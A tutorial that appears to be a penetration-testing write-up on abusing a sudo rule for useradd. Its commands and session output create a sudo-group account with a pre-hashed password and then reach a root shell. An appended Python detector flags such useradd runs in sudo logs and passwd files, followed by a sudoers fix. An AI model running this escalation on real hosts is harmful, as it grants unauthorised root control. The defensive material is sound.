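A sudo rule that allows running useradd can also be used for privilege escalation. The overall idea is to add a user whose group is sudo, then use that new user to run sudo su and become root.
First, look at what useradd needs in order to add such a user: a group and a password. useradd has the following options for this: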
Usage: useradd [options] LOGIN
       useradd -D
       useradd -D [options]

Options:
  -g, --gid GROUP               name or ID of the primary group of the new account
  -m, --create-home             create the user's home directory
  -p, --password PASSWORD       encrypted password of the new account
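-g specifies the group. -m creates the home directory, since logging in needs a default home directory. -p specifies the password, which must already be encrypted (hashed).
Step 1: Generate the hash of the user's password. Python's crypt library is used here; 123456 is the password, and hh is an arbitrary value that acts as the salt.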
test@test:/etc/ppp$ python
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import crypt
import crypt
>>> crypt.crypt("123456","hh")
crypt.crypt("123456","hh")
'hhYwUmQRSuCZ.'
>>> exit
exit
Use exit() or Ctrl-D (i.e. EOF) to exit
>>> exit()
exit()
test@test:/etc/ppp$
Step 2: Use the password hash generated above with sudo useradd to add a user in the sudo group. This creates a user named test2 whose password is 123456.
test@test:/etc/ppp$ sudo /usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2
Step 3: Switch to the test2 user.
test@test:/etc/ppp$ su test2
su test2
Password: 123456
$ id
id
uid=1003(test2) gid=27(sudo) groups=27(sudo)
Step 4: Switch to the root user.
$ sudo su
sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for test2: 123456
root@test:/etc/ppp#
Privilege escalation to root is complete.
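The steps above leave two traces a defender can check for: a sudo log entry for useradd with an admin group and a -p hash, and an account whose primary GID is the sudo group. The following is an added example, not part of the original post; the function names, the ADMIN_GROUPS set, the assumed sudo syslog line layout and the sample data are all assumptions constructed for illustration.

```python
import re

# Groups that confer root via sudo on common distributions (assumption; tune per host).
ADMIN_GROUPS = {"sudo", "wheel", "admin"}
SUDO_LOG = re.compile(r"sudo:\s+(\S+) : .*COMMAND=(.+)$", re.M)

def group_names(group_text):
    """Map every group name and GID string in /etc/group to the group name."""
    table = {}
    for fields in (l.split(":") for l in group_text.splitlines()):
        if len(fields) >= 3:
            table[fields[0]] = table[fields[2]] = fields[0]
    return table

def risky_useradd(log_text, groups):
    """Return (invoker, new_account, reasons) for each suspicious sudo useradd run."""
    hits = []
    for invoker, cmd in SUDO_LOG.findall(log_text):
        # Split "--opt=value" so both spellings are handled; bundled short flags are not.
        argv = [p for a in cmd.split()
                for p in (a.split("=", 1) if a.startswith("--") else [a])]
        if len(argv) < 2 or argv[0].rsplit("/", 1)[-1] != "useradd":
            continue
        reasons = []
        for opt, val in zip(argv[1:], argv[2:]):
            if opt in ("-g", "--gid", "-G", "--groups"):
                reasons += ["admin group " + groups[g] for g in val.split(",")
                            if groups.get(g) in ADMIN_GROUPS]
            elif opt in ("-p", "--password"):
                reasons.append("password hash set on command line")
        if reasons:
            hits.append((invoker, argv[-1], reasons))
    return hits

def admin_primary_gid(passwd_text, groups):
    """Accounts whose primary GID is an admin group, like test2 (gid=27) above."""
    rows = (l.split(":") for l in passwd_text.splitlines())
    return [r[0] for r in rows if len(r) >= 4 and groups.get(r[3]) in ADMIN_GROUPS]

# Constructed sample data modelled on the session above.
GROUP = "root:x:0:\nsudo:x:27:admin1\ntest:x:1002:\n"
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "test2:x:1003:27::/home/test2:/bin/sh\n")
LOG = ("Oct 10 22:31:07 test sudo:     test : TTY=pts/0 ; PWD=/etc/ppp ; USER=root ; "
       "COMMAND=/usr/sbin/useradd -m -g sudo -p hhYwUmQRSuCZ. test2\n"
       "Oct 10 22:40:12 test sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; "
       "COMMAND=/usr/sbin/useradd -m build\n")
```

On a real host, feed the functions the contents of /etc/group, /etc/passwd and the file sudo logs to. The underlying fix is to remove useradd from the user's sudoers rule, since the -g and -p options make it equivalent to granting root.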